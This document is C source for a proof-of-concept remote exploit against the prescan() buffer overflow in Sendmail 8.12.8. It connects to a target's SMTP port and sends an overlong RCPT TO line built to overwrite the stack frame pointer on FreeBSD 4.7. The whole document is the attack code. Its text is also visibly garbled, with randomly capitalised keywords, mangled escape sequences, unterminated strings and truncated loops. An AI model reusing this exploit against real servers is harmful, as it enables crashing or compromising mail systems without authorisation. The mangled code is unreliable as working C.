/ *
* Sendmail 8.12.8 Prescan () Proof of concept exploit by by Bysin
*
* This is to prove what the bug in sendmail 8.12.8 and best is vulnerable.
* ON Sucessful Poc Exploitation The Program Should Crash with The Following:
*
* Program Received Signal Sigsegv, Segmentation Fault.
* 0x5c5c5c5c in ?? ()
*
* /
#include
#include
#include
#include
#include
#include
#include
#include
#include
INT maxarch = 1;
Struct Arch {
Char * OS; // the OS
INT POS; // the position of ebp in the stack, with the last byte being 0x00
Int apos; // the Amount of Bytes After Pvpbuf Where EBP IS LOCATED
Unsigned long addr; // the pointer to the addr buffer
ARCHS [] = {
{"FreeBSD 4.7-Release", 180, 28, 0xbfbfdad1},
}
/
#define buffsize 50096
void header () {
Printf ("Sendmail 8.12.8 PRESCAN () Exploit by Bysin / N / N");
}
Void PrintTargets () {
Unsigned long i;
HEADER ();
Printf ("/ t target / t addr / t / t os / N");
Printf ("/ t ------------------------------------------ / n ");
For (i = 0; i Printf ("/ n"); } Void PrintResponse (char * a) { Printf ("% s / n", a); } Void Writesocket (int suck, char * buf) { IF (SOND (SOCK, BUF, STRLEN (BUF), 0) <= 0 { Printf ("Error Writing to Socket / N); exit (0); } PrintResponse (BUF); } Void ReadSocket (int suck, int response) { CHAR TEMP [buffsize]; MEMSET (Temp, 0, Sizeof (TEMP)); IF (RECV (SOCK, TEMP, SIZEOF (TEMP), 0) <= 0) { Printf ("ERROR ROM Socket / N); exit (0); } IF (Response! = atol (TEMP)) { Printf ("Bad Response:% S / N", TEMP); exit (0); } Else PrintResponse (TEMP); } Void relay (int suck) { While (1) { CHAR TEMP [buffsize]; MEMSET (Temp, 0, Sizeof (TEMP)); IF (RECV (SOCK, TEMP, SIZEOF (TEMP), 0) <= 0) { Printf ("Server Vulnerable (CraShed) / N"); exit (0); } PRINTRESPONSE (TEMP); IF (atol (TEMP) == 553) { Printf ("NOT ExploITable / N"); exit (0); } } } INT main (int Argc, char ** argv) { Struct SockAddr_in Server; UNSIGNED Long ipaddr, i, j, m Int Sock, Target; CHAR TMP [BUFSIZE], BUF [BUFSIZE], * P, * POS = NULL IF (argc <= 2) { Printf ("% s PRINTTTARGETS (); Return 0; } Target = atol (argv [2]); IF (Target <0 || Target> = maxarch) { PRINTTTARGETS (); Return 0; } HEADER (); IF ((Sock = Socket (AF_INET, SOCK_STREAM, 0)) == -1) { Printf ("Unable To Create Socket / N); exit (0); } Server.sin_family = af_INet; Server.sin_port = HTONS (25); Printf ("Resolving Address ..."); Fflush (stdout); IF ((iPadDR = INET_ADDR (Argv [1])) == -1) { Struct Hostent * Hostm; IF ((Hostm = gethostByname) == null) { Printf ("Unable to Resolve Address / N); exit (0); } Memcpy ((char *) & server.sin_addr, hostm-> h_addr, hostm-> h_length); } Else Server.sin_addr.s_addr = ipaddr; MEMSET (& (Server.sin_zero), 0, 8); Printf ("Address Found / N"); Printf ("Connecting ..."); Fflush (stdout); IF (Connect (Sock, SockAddr *) & Server, SIZEOF (Server))! = 0) { Printf ("Unable to connection connect / n"); exit (0); } Printf ("Connected / N"); Printf ("Sending Exploit ... / N"); fflush (stdout); Readsocket (Sock, 220); Writesocket (Sock, "Helo Yahoo.com/r/N"); Readsocket (Sock, 250); Writesocket (Sock, "Mail from: Readsocket (Sock, 250); MEMSET (BUF, 0, SIZEOF (BUF)); STRCPY (BUF, "RCPT TO:"); P = BUF Strlen (BUF); For (i = 1, j = 0, m = 0; i <1242; i ) { IF (! (i% 256)) { * p = ';'; J ; } Else { IF (j <4) * p = 'a'; Else { IF (m == Archs [target] .pos) POS = P; // if (m> archs [target] .pos) * p = 'b'; ELSE * p = 'a'; M ; } } } IF (POS) Memcpy (POS, (CHAR *) & Archs [target] .addr, 4); * p = ';'; For (i = 0; i * p = '//'; * p = 0xff; } STRCAT (BUF, "/ R / N"); Writesocket (SOCK, BUF); RELAY (SOCK); }
